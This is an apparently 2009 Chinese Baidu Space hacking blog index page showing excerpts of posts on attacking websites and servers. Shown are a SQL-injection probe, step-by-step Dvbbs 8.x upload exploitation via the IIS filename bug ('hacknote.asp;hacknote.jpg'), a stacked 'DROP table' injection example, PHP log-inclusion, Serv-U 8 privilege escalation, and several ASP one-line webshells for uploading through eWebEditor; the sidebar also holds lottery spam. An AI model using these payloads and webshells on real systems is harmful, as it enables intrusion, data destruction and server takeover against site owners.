默默许愿's Blog
百度空间 | 百度首页 
 
个人档案
 
mmxyblog

上次登录:
27天前
加为好友
 
   
 
日历
 
     
 
文章分类
 
默认分类(0)
 
心情随笔(55)
 
技术文章(333)
 
杂七杂八(27)
 
休闲搞笑(21)
 
情感天地(6)
 
黑客新闻(11)
 
安全相关(25)
 
数据恢复(0)
 
取证评估(5)
 
linux相关(25)
 
软件编程(1)
 
溢出编程(3)
 
mysql,php(5)
 
Windows(2)
 
.小布(0)
 
     
 
最新照片
 
   
 
背景音乐
 
 
留言板
 

呵呵,来我空间看看吧,朋友,你空间不错,呵呵
 

我刚开通百度空间,能和你交个朋友吗?想找个人教玩空间
 

还记得我么?有时间也来看看我,和大家一起探讨下男人女人 谁更好色的问题,呵呵
 

财神吧两元两角购彩平台,为您提供精准的购彩计划。营业期间一直有口皆碑与雄厚的经济...
 

彩票是智者的游戏,不是愚者的赌局。快来我们QQ群看看(33630412) 让你玩转彩市
 
留言(65条)>>
     
 
订阅我的空间
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     
 
 
文章列表
 
一句话判断数据库是否web和数据库分离
2009-10-11 12:13
and exists(select * from admin where 1=(Select (case when host_name()
=@@servername then 1 else 0 end)))
加在注入点后面,如果返回正常说明web和数据库是同一服务器,如果不正常责说明是分离的.
注意admin是数据库存在的一个表,自己找吧.
类别:技术文章 | 评论(0) | 浏览()
 
动网8.x最新0day
2009-09-30 01:09

利用的还是IIS的文件名解析漏洞.

影响版本:
Powered By Dvbbs Version 8.2.0
Powered By Dvbbs Version 8.1.0
Powered By Dvbbs Version 8.0.0

注册用户-我的主页-个人空间管理

userspace.asp?sid=0&act=modifyset

然后编辑CSS风格-文件管理

bbs/Dv_plus/myspace/script/filemange.asp

上传 hacknote.asp;hacknote.jpg

接下来知道了吧

赶快行动吧

类别:技术文章 | 评论(0) | 浏览()
 
保证WEB站点安全评估成功的四个关键因素
2009-09-24 21:23
如今,针对WEB应用的安全威胁越来越多。这些安全威胁有些是利用WEB站点所在的服务器系统漏洞,有些是利用WEB应用程序本身的漏洞,有些是利用数据库的漏洞来进行攻击的。因此,使用一些方法和工具,对整个WEB站点进行详细的安全评估,找出目前WEB服务器系统、WEB应用程序及数据库中存在的弱点,才有可能将安全威胁抹杀在最初状态。

  在对WEB

阅读全文>>
类别:取证评估 | 评论(0) | 浏览()
 
Linux下Oracle获取shell
2009-09-24 21:22
作者:浅凝

很多时候对于开放1521端口的Windows下Oracle数据库服务器,因为大多存在默认低权限用户dbsnmp,或者人品爆发高权限的用户 (sysdba)是默认密码或弱口令,由此可以通过Oracle的一些提权漏洞获取Oracle的最高权限,直至得到系统的SYSTEM权限。

阅读全文>>
类别:技术文章 | 评论(0) | 浏览()
 
SQLids.vbs 0.2版
2009-09-24 21:20

作者:lcx

'今天搞了个网站,注入点过滤得很变态,工具都不能跑,于是写了这个东东:

set arg=wscript.arguments
If (LCase(Right(Wscript.fullname,11))="Wscript.exe") Then
Wscript.Quit
End

阅读全文>>
类别:技术文章 | 评论(0) | 浏览()
 
高级Mysql攻击技术(翻译blackhat 2009文章)
2009-09-21 15:06
Mysql是在LAMP和WAMP上最流行的数据库服务器软件套件。DBMS连接默认是不支持堆查询。这就使得一些技术去实施远程代码执行漏
下面的就是再SQL注入攻击中的一个堆查询的例子
SELECT name FROM record WHERE id = 1; DROP table record; DROP table address--
2)把本地文件的内容进行对等的16进制的转换。
3)切分16进制的字符串到1024字符长的大块
4)INSERT 第一个大块进支持表的字段里面
5)UPDATE其他的大的块添加到这个
阅读全文>>
类别:技术文章 | 评论(0) | 浏览()
 
黑客渗透linux下载备份取shell
2009-09-21 15:05

关于php包含Apache日志的利用,其实也就是利用提交的网址里有php语句,然后再被Apache服务器的日志记录,然后php再去包含执行,从而包含了去执行。当然,这种办法最大的弊端是Apache日志肯定会过大,回应的时候当然会超时什么的,所以也是受条件限制的。全当一种研究算了。下面是我的测试过程,我觉得很有意思,你也看看。
比如说,在一个php存在包含漏洞就像这样,存在一句php包含漏洞的语句


以下是引用片段:
<? include($zizzy); ?>   //包含变量$zizzy

阅读全文>>
类别:技术文章 | 评论(0) | 浏览()
 
Serv-U 8 本地提权
2009-09-21 15:05

看cnbeta发现su出8这个版本了。

想想以前写过一个7的本地提权。

不知道8有什么安全方面的更改。

下载来研究下,发现居然还是可以提权的,只是su7的那个不能直接用,稍微修改了下执行的流程。

Su8的管理平台是http的,继承了su7的方式。
抓包,分析,发现了以下路程是可以利用的。
1, 管理员从管理控制

阅读全文>>
类别:技术文章 | 评论(0) | 浏览()
 
应对eWebEditor漏洞上传文件500错误的方法
2009-09-21 15:04
来源:van
相信大家对eWeb并不陌生

大家在搞站的可否发现有的uploadfiles目录里面传上去的大马或小马是500错误

入侵了这么久,发现在此情况下,上传一句话,可以连接!

eval的一句话有时候会失败

execute的一句话基本上都是成功的!

By:van

附:(多种写一句话的方法)

ASP一句话
1.<%eval request("YouPass")%>
2. <%executerequest("YouPass")%>
3. <%execute(request("YouPass"))
阅读全文>>
类别:技术文章 | 评论(0) | 浏览()
 
全面防御asp网站防黑客攻击
2009-09-21 15:04
asp最脆弱的不是技术,而是防范黑客攻击。而无论怎样攻击,通过QueryString和form,只要这两处防范好了,问题就解决了

  下面是我自家独创的一些代码,供大家参考

  一.防通过querystring的sql攻击

  一般sql能够攻击的页面通常是在参数为数字的页面

  1.首先我们做一个警告

阅读全文>>
类别:技术文章 | 评论(0) | 浏览()
 
更多文章>>
     
 
最近访客
 
 

new2old
congpeiyu
似水年华0106
我很懒╮先生

cnfishice
za88488848
依然梅西
ipoemcsw
     


©2009 Baidu